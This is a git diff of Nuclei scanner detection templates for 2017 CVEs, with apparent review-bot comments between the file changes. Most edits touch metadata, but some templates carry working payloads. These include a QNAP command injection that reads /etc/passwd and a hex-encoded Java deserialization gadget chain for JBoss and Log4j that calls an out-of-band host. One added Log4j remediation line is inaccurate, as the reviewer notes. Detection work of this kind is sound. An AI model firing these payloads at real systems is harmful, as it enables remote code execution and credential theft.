diff --git a/nuclei-templates/CVE-2017/CVE-2017-18562.yaml b/nuclei-templates/CVE-2017/CVE-2017-18562.yaml index af798841cb..cf3f3bc36f 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18562.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18562.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18562 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36857 cpe: cpe:2.3:a:bestwebsoft:error_log_viewer:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: error_log_viewer framework: wordpress publicwww-query: "/wp-content/plugins/error-log-viewer/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Error Log Viewer by BestWebSoft")' condition: and -# digest: 4a0a00473045022025f4273f398c7b248a6b91a2ea1c21936fbc314e3f36d9bc393d3679d098c8e8022100eb283d90e8200c28e6cafdbb214db272e838194ef6a85ba21b3b4f5c63f0ece6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204ffa643dfec6a2a1304afeb8c507e527816e6ffdbf5bf55d1f78ce117196956c022062d2904783e48e1571ddcd034438544bd6ef716a64604b5cd204c9e6d93f17fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18564.yaml b/nuclei-templates/CVE-2017/CVE-2017-18564.yaml index cf327a91fd..4aa9bf9453 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18564.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18564.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18564 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:sender:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -26,7 +26,7 @@ info: product: sender framework: wordpress publicwww-query: "/wp-content/plugins/sender/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Sender by BestWebSoft")' condition: and -# digest: 4a0a00473045022100daa604addde162520e7f2e0a763dca1a7ce6a3dac984c168ad92821acb2be13b022011c39e9ebe0f0e167c67abefd5cfa3ba057edc5ad037b993e552368b79b46078:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206bf5a1ea4bf5034892e440458b150b6df66ff63e42a5677e30878b7d4b43d34102205868e55cb82cdee0363c36f0da53f76767397ddc734f06b2df94b8835493bbe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18565.yaml b/nuclei-templates/CVE-2017/CVE-2017-18565.yaml index b7491b01cd..8c99ba4b6a 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18565.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18565.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18565 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:updater:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: updater framework: wordpress publicwww-query: "/wp-content/plugins/updater/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated + tags: cve2017,cve,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft http: - raw: 
@@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Updater by BestWebSoft")' condition: and -# digest: 4a0a0047304502201f4cc29bc2dc1bb345fd65444af87c4996e808ca51e73933e1b1c7ad3f62d8a5022100e74e5c14061257bfe0d7e0291e063d9ec7595d3759bdd5638ae174cf5fc858c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a044599dd64fbe525d5491598bb2bd08fb20f3b1246daa85cf894198d9a4b72a02202c881e075c5cf297c2153729f9a3bca4925a615334a49850ca79a635c41b5efb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18566.yaml b/nuclei-templates/CVE-2017/CVE-2017-18566.yaml index 066007d8e1..fdd8dd2053 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18566.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18566.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18566 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:user_role:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: user_role framework: wordpress publicwww-query: "/wp-content/plugins/user-role/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "User Role by BestWebSoft")' condition: and -# digest: 4a0a00473045022100ddd41eb1e0cadcf8a5168f05c0eb31fcfc9f235e71cb2d7cc77df1dd79fa3462022004e7f4466551bd1625930205949aafaee29f0f9371141056d11cdeb949d5b773:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d379d9480f868260b65e821ad630ab781d2dd52c2f0e25e667b41cf3bf9c7cb022068938f861976e3222cbe26a54ec296eef974f942967912acb942edb9a52d2f7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2017/cve-2017-18638.yaml b/nuclei-templates/CVE-2017/CVE-2017-18638.yaml
similarity index 100%
rename from nuclei-templates/CVE-2017/cve-2017-18638.yaml
rename to nuclei-templates/CVE-2017/CVE-2017-18638.yaml
diff --git a/nuclei-templates/CVE-2017/CVE-2017-5645.yaml b/nuclei-templates/CVE-2017/CVE-2017-5645.yaml
index eed23e98a7..fa34d154c7 100644
--- a/nuclei-templates/CVE-2017/CVE-2017-5645.yaml
+++ b/nuclei-templates/CVE-2017/CVE-2017-5645.yaml
@@ -6,29 +6,41 @@ info: severity: critical description: | In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. + impact: | + Successful exploitation of this vulnerability could allow remote attackers to execute arbitrary commands on the affected server. + remediation: | + Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups. reference: - https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645 - https://nvd.nist.gov/vuln/detail/CVE-2017-5645 + - http://www.openwall.com/lists/oss-security/2019/12/19/2 + - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html + - http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2017-5645 + cwe-id: CWE-502 + epss-score: 0.81948 + epss-percentile: 0.98292 + cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* metadata: max-request: 2 - tags: vulhub,network,apache,log4j,rce,deserialization,oast - + vendor: apache + product: log4j + tags: cve,cve2017,network,vulhub,apache,log4j,rce,deserialization,oast variables: end: "\r\n" - tcp: - - inputs: - - data: "{{generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex')+concat(end)}}" - - host: + - host: - "{{Hostname}}" - "{{Host}}:4712" - + inputs: + - data: "{{generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex')+concat(end)}}" read-size: 100 matchers: - type: word part: interactsh_protocol words: - dns +# digest: 490a0046304402206bea1e2f766c4391d5fed24e01caf16856956008980638b1d2fd3c8625f6fc33022031b5800c1421dcd3042cbc5d1d34d7f16b5cdc056336d3d5ecc4e6cd55325003:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
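Review bot: The added `remediation` text talks about Log4j 2.15.0, disabling JNDI lookups and a Java agent, which is the guidance for the 2021 JNDI-lookup vulnerability, not for this socket-server deserialization bug; the template's own description says the flaw is in 2.x before 2.8.2. Suggest `remediation: | Upgrade to Apache Log4j 2.8.2 or later, and do not expose the TCP/UDP socket server to untrusted networks.` so the advice matches the CVE the template detects. The added `impact` line is consistent with the description and can stay. The reordering of `host:` above `inputs:` in the tcp block looks purely structural; the rest of the file is within this hunk.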
diff --git a/nuclei-templates/CVE-2017/CVE-2017-5689.yaml b/nuclei-templates/CVE-2017/CVE-2017-5689.yaml
index 00ab832295..31c5b32685 100644
--- a/nuclei-templates/CVE-2017/CVE-2017-5689.yaml
+++ b/nuclei-templates/CVE-2017/CVE-2017-5689.yaml
@@ -1,37 +1,47 @@ id: CVE-2017-5689 info: - name: Intel Active Management Technology - Authentication Bypass + name: Intel Active Management - Authentication Bypass author: pdteam severity: critical description: | - An unprivileged network attacker could gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability (ISM). An unprivileged local attacker could provision manageability features gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology (AMT), Intel Standard Manageability (ISM), and Intel Small Business Technology (SBT). + Intel Active Management platforms are susceptible to authentication bypass. A non-privileged network attacker can gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability. A non-privileged local attacker can provision manageability features, gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology, Intel Standard Manageability, and Intel Small Business Technology. The issue has been observed in versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 for all three platforms. Versions before 6 and after 11.6 are not impacted. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Intel Active Management firmware, potentially leading to unauthorized control of the affected system. + remediation: | + Update the Intel Active Management firmware to version 11.6.55, 11.7.55, 11.11.55, 11.0.25, 8.1.71, or 7.1.91 to mitigate the vulnerability. 
reference: - https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr - https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability - https://www.embedi.com/news/mythbusters-cve-2017-5689 - https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf + - https://nvd.nist.gov/vuln/detail/cve-2017-5689 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-5689 + epss-score: 0.97395 + epss-percentile: 0.99912 + cpe: cpe:2.3:o:intel:active_management_technology_firmware:6.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: intel + product: active_management_technology_firmware shodan-query: title:"Active Management Technology" - verified: "true" - tags: cve,cve2017,amt,intel,tenable,kev + tags: cve2017,cve,amt,intel,tenable,kev -requests: +http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | GET /hw-sys.htm HTTP/1.1 Host: {{Hostname}} digest-username: admin - req-condition: true + matchers-condition: and matchers: - type: word @@ -44,3 +54,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100c1ebf3bfcfaab0443bed7c0c3767867af141501aac600f4f387e61c7d0dab97c022060fd9aabe9ac1b63059fb46dfa7eb24a6b438f68a5ee9f4f028cb7e65532233c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-6361.yaml b/nuclei-templates/CVE-2017/CVE-2017-6361.yaml deleted file mode 100644 index 90710cf3a2..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-6361.yaml +++ /dev/null 
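Review bot: Dropping `req-condition: true` while keeping two raw requests changes how the matchers are evaluated: as far as I know they now run against each response on its own instead of once across both, so any matcher that referenced the second response (`body_2`-style DSL) would silently stop matching; the word matcher body lies between the two hunks, so this needs checking against the full file. If only the `/hw-sys.htm` response is meant to be judged, `matchers-condition: and` by itself does not express that. The new `cpe` pins version `6.0` while the new description says 6.x through 11.6 are affected; the wildcard version used by the other templates in this patch would be more accurate. The description also has a missing comma in `8.x 9.x`. The first hunk starts on the previous line.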
@@ -1,22 +0,0 @@ -id: CVE-2017-6361 -info: - name: QNAP QTS RCE - author: medbsq - severity: critical -# https://www.cvebase.com/cve/2017/6360 - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/authLogin.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;cat%20/etc/passwd)>%262" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - matchers-condition: and - matchers: - - type: word - words: - - "root:[x*]:0:0:" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/CVE-2017-7391.yaml b/nuclei-templates/CVE-2017/CVE-2017-7391.yaml index 3d3c5e1be3..b17e18d01d 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-7391.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-7391.yaml @@ -1,7 +1,7 @@ id: CVE-2017-7391 info: - name: Magmi Cross-Site Scripting v.0.7.22 + name: Magmi – Cross-Site Scripting v.0.7.22 author: pikpikcu severity: medium description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL. @@ -25,13 +25,12 @@ requests: - type: status status: - 200 - - type: word - part: body words: - '"><' + part: body - type: word - part: header words: - "text/html" + part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-7504.yaml b/nuclei-templates/CVE-2017/CVE-2017-7504.yaml deleted file mode 100644 index e40ee0b986..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-7504.yaml +++ /dev/null 
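Review bot: The matcher reorder in the CVE-2017-7391 hunk `@@ -25,13 +25,12 @@` leaves this template on the legacy `requests:` key with no `# digest:` trailer, while sibling templates touched in the same patch (CVE-2017-5689, cve-2017-5631) are migrated to `http:` and signed. Moving `part: body` and `part: header` below their `words:` lists changes nothing functionally, so if the file is being rewritten anyway, replacing `requests:` with `http:` in the same change would keep the tree consistent. The en dash added to `name` in the first hunk is the only other edit to this file.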
@@ -1,48 +0,0 @@ -id: CVE-2017-7504 - -info: - name: jBoss HTTPServerILServlet Deserialization - author: j4vaovo - severity: critical - description: | - HTTPServerILServlet.java in JMS over HTTP Invocation Layer of the JbossMQ implementation, which is enabled by default in Red Hat Jboss Application Server <= Jboss 4.X does not restrict the classes for which it performs deserialization, which allows remote attackers to execute arbitrary code via crafted serialized data. - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7504 - - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-7504 - - https://nvd.nist.gov/vuln/detail/CVE-2017-7504 - tags: cve,cve2017,deserialization,jboss - -variables: - prefix: "aced00057372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573736167657400124c6a6176612f6c616e672f537472696e673b5b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0008707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000037372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e000578700000005574002679736f73657269616c2e7061796c6f6164732e436f6d6d6f6e73436f6c6c656374696f6e7335740018436f6d6d6f6e73436f6c6c656374696f6e73352e6a6176617400096765744f626a6563747371007e000b0000002f71007e000d71007e000e71007e000f7371007e000b0000002274001979736f73657269616c2e47656e6572617465506
1796c6f616474001447656e65726174655061796c6f61642e6a6176617400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e00077872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e001a78737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b657971007e00014c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00017870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020
00078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e003200000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e00327371007e002b7571007e002f00000002707571007e002f00000000740006696e766f6b657571007e003200000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e002f7371007e002b757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b470200007870000000017400" - suffix: "740004657865637571007e00320000000171007e00377371007e0027737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878" - cmd: 'nslookup {{interactsh-url}}' - cmdhex: "{{hex_encode('{{cmd}}')}}" - len: "{{len('{{cmd}}')}}" - lenhex: "{{dec_to_hex({{len}})}}" - commons-collections5: "{{hex_decode('{{prefix}}{{lenhex}}{{cmdhex}}{{suffix}}')}}" - -http: - - raw: - # - | - # POST /jbossmq-httpil/HTTPServerILServlet HTTP/1.1 - # Host: {{Hostname}} - - # {{generate_java_gadget("commons-collections5", "ping {{interactsh-url}}", "raw")}} - - - | - POST /jbossmq-httpil/HTTPServerILServlet HTTP/1.1 - Host: {{Hostname}} - - {{commons-collections5}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "dns" - - - type: word - part: header - words: - - "x-java-serialized-object" diff --git a/nuclei-templates/CVE-2017/CVE-2017-7855.yaml b/nuclei-templates/CVE-2017/CVE-2017-7855.yaml index fa1dc0032b..73a298378d 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-7855.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-7855.yaml 
@@ -16,7 +16,7 @@ info: cve-id: CVE-2017-7855 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.378 + epss-percentile: 0.37043 cpe: cpe:2.3:a:icewarp:server:11.3.1.5:*:*:*:*:*:*:* metadata: verified: true @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022006d14916bd38c6b34cc8f0fa1124cd629376e520c9ce9628245fe587f7555f9b02200102baabcb9b473b2f3f5873a6fd77743c2cd59554869fc4785f922c9700e825:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ecd748d0da7f1f3e5a44b0351d29bf699e21b0bcfd59e00013b81f7dde887d6f02204f738f06eb2c47e277ac21b6bf66fc965783038678586e2b9e397c57124bc240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-7925.yaml b/nuclei-templates/CVE-2017/CVE-2017-7925.yaml index fd446cc819..4e91d62001 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-7925.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-7925.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information. + impact: | + This vulnerability can lead to unauthorized access to sensitive information, potentially compromising the security of the system. remediation: | To remediate this vulnerability, ensure that the configuration file is properly secured and access to it is restricted to authorized personnel only. reference: 
@@ -17,15 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2017-7925 cwe-id: CWE-522,CWE-260 - epss-score: 0.35031 - epss-percentile: 0.96704 + epss-score: 0.42592 + epss-percentile: 0.97235 cpe: cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dahuasecurity product: dh-ipc-hdbw23a0rn-zs_firmware shodan-query: http.favicon.hash:2019488876 - tags: cve,cve2017,dahua,camera + tags: cve,cve2017,dahua,camera,dahuasecurity http: - method: GET @@ -45,4 +47,4 @@ http: group: 1 regex: - 1:(.*:.*):1:CtrPanel -# digest: 490a004630440220133bea5d926eae339ba584119c447e358883137e19b11aa0b7925ebf56f72432022005f75a1de089c0a7bcdfa891d0e4326915bb5100d61b522e3bc025f7347069fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b025841e51356e6480d45b4bdac30058df82b301fc177b329ddfaae64739dc7d022055c5f87e84ec531417e24f1d4eacca97cbb1485d8cda61206978c53803ee605b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-8229.yaml b/nuclei-templates/CVE-2017/CVE-2017-8229.yaml new file mode 100644 index 0000000000..d2bb37a789 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-8229.yaml 
@@ -0,0 +1,58 @@ +id: CVE-2017-8229 + +info: + name: Amcrest IP Camera Web Management - Data Exposure + author: pussycat0x + severity: critical + description: | + Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials. + impact: | + An attacker can gain unauthorized access to sensitive data. + remediation: | + Apply the latest firmware update provided by the vendor to fix the vulnerability. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-8229 + - http://packetstormsecurity.com/files/153224/Amcrest-IPM-721S-Credential-Disclosure-Privilege-Escalation.html + - https://github.com/ethanhunnt/IoT_vulnerabilities/blob/master/Amcrest_sec_issues.pdf + - https://seclists.org/bugtraq/2019/Jun/8 + - https://github.com/d4n-sec/d4n-sec.github.io + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2017-8229 + cwe-id: CWE-255 + epss-score: 0.89506 + epss-percentile: 0.98685 + cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: amcrest + product: ipm-721s_firmware + shodan-query: html:"Amcrest" + fofa-query: "Amcrest" + tags: cve2017,cve,packetstorm,seclists,amcrest,iot + +http: + - method: GET + path: + - "{{BaseURL}}/current_config/Sha1Account1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DevInformation" + - "SerialID" + condition: and + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100b6fd9d1debb3a00599d529ed9870adb5c6425994cafe24875150518f3a770549022010a916473eeea40a72614d21ce4acd2715c401e4e6bd33fd9bdf6440eac4788d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-9416.yaml b/nuclei-templates/CVE-2017/CVE-2017-9416.yaml index dc0fb55569..f2bc24d415 100644 
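Review bot: `cwe-id: CWE-255` names a CWE category (credentials management) rather than the specific weakness the description gives, which is an unauthenticated endpoint that returns stored administrative credentials. CVE-2017-7925 in this same patch uses `cwe-id: CWE-522,CWE-260` for a similar credentials-in-configuration issue, and CWE-306 (missing authentication) would also fit; either is more useful for triage than the category. The `remediation` line is generic ("Apply the latest firmware update"); if the vendor material in the references names a fixed firmware version, stating it here makes the finding actionable. The matcher set (body strings, `application/octet-stream`, 200) only confirms the configuration blob is served, which is adequate for a detection template.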
--- a/nuclei-templates/CVE-2017/CVE-2017-9416.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-9416.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Allows an attacker to read arbitrary files on the server. remediation: | Upgrade to a patched version of Odoo or apply the necessary security patches. reference: @@ -17,14 +19,14 @@ info: cve-id: CVE-2017-9416 cwe-id: CWE-22 epss-score: 0.01037 - epss-percentile: 0.8223 + epss-percentile: 0.83585 cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: odoo product: odoo - tags: cve,cve2017,odoo,lfi + tags: cve2017,cve,odoo,lfi http: - method: GET @@ -49,4 +51,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 4a0a00473045022100b7868cfb6aea9ffd5205db402460677e412d6dc7235c64ee3a48cc03de50f6cb0220544468c465d73cb5a5a239d38bd98fc3ae0600999c558117389c355815ae1baa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eeb180faf838b4927b92bf8517268ab8712df323d040cc7f15dbb2aa4ab9062e02202242d7b85aaddb683b6a9c5637ecaf2c10d6770fa42f98931746defb95e70d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-9506.yaml b/nuclei-templates/CVE-2017/CVE-2017-9506.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-9506.yaml rename to nuclei-templates/CVE-2017/CVE-2017-9506.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-9822.yaml b/nuclei-templates/CVE-2017/CVE-2017-9822.yaml index 855f7261ea..09de04f19d 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-9822.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-9822.yaml 
@@ -1,20 +1,18 @@ id: CVE-2017-9822 + info: - name: DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution + name: DotNetNuke Cookie Deserialization Remote Code Execution (RCE) author: milo2012 severity: high - description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected by a deserialization vulnerability that leads to remote code execution. - reference: - - https://github.com/murataydemir/CVE-2017-9822 - - https://nvd.nist.gov/vuln/detail/CVE-2017-9822 - - http://www.dnnsoftware.com/community/security/security-center - - http://www.securityfocus.com/bid/102213 + description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE) + tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization + reference: https://github.com/murataydemir/CVE-2017-9822 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-score: 8.80 cve-id: CVE-2017-9822 cwe-id: CWE-20 - tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization + requests: - raw: - | @@ -23,6 +21,7 @@ requests: Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Cookie: dnn_IsMobile=False; 